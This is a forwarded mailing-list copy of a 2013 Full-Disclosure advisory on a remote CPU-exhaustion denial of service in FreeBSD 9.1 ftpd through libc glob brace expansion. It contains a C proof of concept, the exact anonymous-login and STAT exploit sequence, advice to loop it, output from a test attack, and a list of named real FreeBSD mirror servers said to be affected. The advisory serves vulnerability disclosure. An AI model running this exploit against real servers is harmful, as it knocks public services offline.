Enviado via iPhone
Início da mensagem encaminhada > De: Maksymilian Arciemowicz <m...@cxib.net> > Data: 1 de fevereiro de 2013 09:33:57 BRST > Para: full-disclos...@lists.grok.org.uk > Assunto: [Full-disclosure] FreeBSD 9.1 ftpd Remote Denial of Service > > FreeBSD 9.1 ftpd Remote Denial of Service > Maksymilian Arciemowicz > http://cxsecurity.org/ > http://cxsec.org/ > > Public Date: 01.02.2013 > URL: http://cxsecurity.com/issue/WLB-2013020003 > > Affected servers: > - ftp.uk.freebsd.org, > - ftp.ua.freebsd.org, > - ftp5.freebsd.org, > - ftp5.us.freebsd.org, > - ftp10.freebsd.org, > - ftp3.uk.freebsd.org, > - ftp7.ua.freebsd.org, > - ftp2.se.freebsd.org, > - ftp2.za.FreeBSD.org, > - ftp2.ru.freebsd.org, > - ftp2.pl.freebsd.org > and more... > > > --- 1. Description --- > I have decided check BSD ftpd servers once again for wildcards. Old > bug in libc (CVE-2011-0418) allow to Denial of Service ftpd in last > FreeBSD version. > Attacker, what may connect anonymously to FTP server, may cause CPU > resource exhaustion. Login as a 'USER anonymous' 'PASS anonymous', > sending 'STAT' command with special wildchar, enought to create ftpd > process with 100% CPU usage. > > Proof of Concept (POC): > See the difference between NetBSD/libc and FreeBSD/libc. > --- PoC --- > #include <stdio.h> > #include <glob.h> > > int main(){ > glob_t globbuf; > char > stringa[]="{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}"; > glob(stringa,GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE|GLOB_LIMIT, NULL, > &globbuf); > } > --- PoC --- > > --- Exploit --- > user anonymous > pass anonymous > stat > {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b} > --- /Exploit --- > > Result of attack: > ftp 13034 0.0 0.4 10416 1944 ?? R 10:48PM 0:00.96 > ftpd: cxsec.org anonymous/anonymous (ftpd) > ftp 13035 0.0 0.4 10416 1944 ?? R 10:48PM 0:00.89 > ftpd: cxsec.org anonymous/anonymous (ftpd) > ftp 13036 0.0 0.4 10416 1944 ?? R 10:48PM 0:00.73 > ftpd: cxsec.org anonymous/anonymous (ftpd) > ftp 13046 0.0 0.4 10416 1952 ?? R 10:48PM 0:00.41 > ftpd: cxsec.org anonymous/anonymous (ftpd) > ftp 13047 0.0 0.4 10416 1960 ?? R 10:48PM 0:00.42 > ftpd: cxsec.org anonymous/anonymous (ftpd) > ... > root 13219 0.0 0.3 10032 1424 ?? R 10:52PM 0:00.00 > /usr/libexec/ftpd -dDA > root 13225 0.0 0.3 10032 1428 ?? R 10:52PM 0:00.00 > /usr/libexec/ftpd -dDA > root 13409 0.0 0.3 10032 1404 ?? R 10:53PM 0:00.00 > /usr/libexec/ftpd -dDA > root 13410 0.0 0.3 10032 1404 ?? R 10:53PM 0:00.00 > /usr/libexec/ftpd -dDA > ... > > =>Sending: > STAT > {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b} > > =>Result: > @ps: > ftp 1336 100.0 0.5 10416 2360 ?? R 11:15PM 600:39.95 > ftpd: 127.0.0.1: anonymous/anonym...@cxsecurity.com: \r\n (ftpd)$ > @top: > 1336 root 1 103 0 10416K 2360K RUN 600:53 100.00% ftpd > > one request over 600m (~10h) execution time and 100% CPU usage. This > issue allow to create N ftpd processes with 100% CPU usage. > > Just create loop while(1) and send these commands > --- > user anonymous > pass anonymous > stat > {a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b} > --- > > NetBSD and OpenBSD has fixed this issue in glob(3)/libc (2011) > http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gen/glob.c.diff?r1=1.24&r2=1.23.10.2 > > The funniest is that freebsd use GLOB_LIMIT in ftpd server. > http://www.freebsd.org/cgi/cvsweb.cgi/src/libexec/ftpd/ftpd.c > --- > if (strpbrk(whichf, "~{[*?") != NULL) { > int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE; > > memset(&gl, 0, sizeof(gl)); > gl.gl_matchc = MAXGLOBARGS; > flags |= GLOB_LIMIT; > freeglob = 1; > if (glob(whichf, flags, 0, &gl)) { > --- > > but GLOB_LIMIT in FreeBSD dosen't work. glob(3) function allow to CPU > resource exhaustion. ;] > > Libc was also vulnerable in Apple and Oracle products. > http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html > http://support.apple.com/kb/HT4723 > > only FreeBSD and GNU glibc are affected > > > --- 2. Exploit --- > http://cxsecurity.com/issue/WLB-2013010233 > > > --- 3. Fix --- > Don't use ftpd on FreeBSD systems. :) You may use vsftpd to resolve > problem with security ;) > > > --- 4. References --- > Multiple Vendors libc/glob(3) remote ftpd resource exhaustion > http://cxsecurity.com/issue/WLB-2010100135 > http://cxsecurity.com/cveshow/CVE-2010-2632 > > Multiple FTPD Server GLOB_BRACE|GLOB_LIMIT memory exhaustion > http://cxsecurity.com/issue/WLB-2011050004 > http://cxsecurity.com/cveshow/CVE-2011-0418 > > More CWE-399 resource exhaustion examples: > http://cxsecurity.com/cwe/CWE-399 > > The regcomp implementation in the GNU C Library allows attackers to > cause a denial of service proftpd > http://cxsecurity.com/cveshow/CVE-2010-4051 > http://cxsecurity.com/cveshow/CVE-2010-4052 > http://www.kb.cert.org/vuls/id/912279 > > > --- 5. Contact --- > Maksymilian Arciemowicz > max 4T cxsecurity.com > http://cxsecurity.com/ > http://cxsec.org/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ------------------------- Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd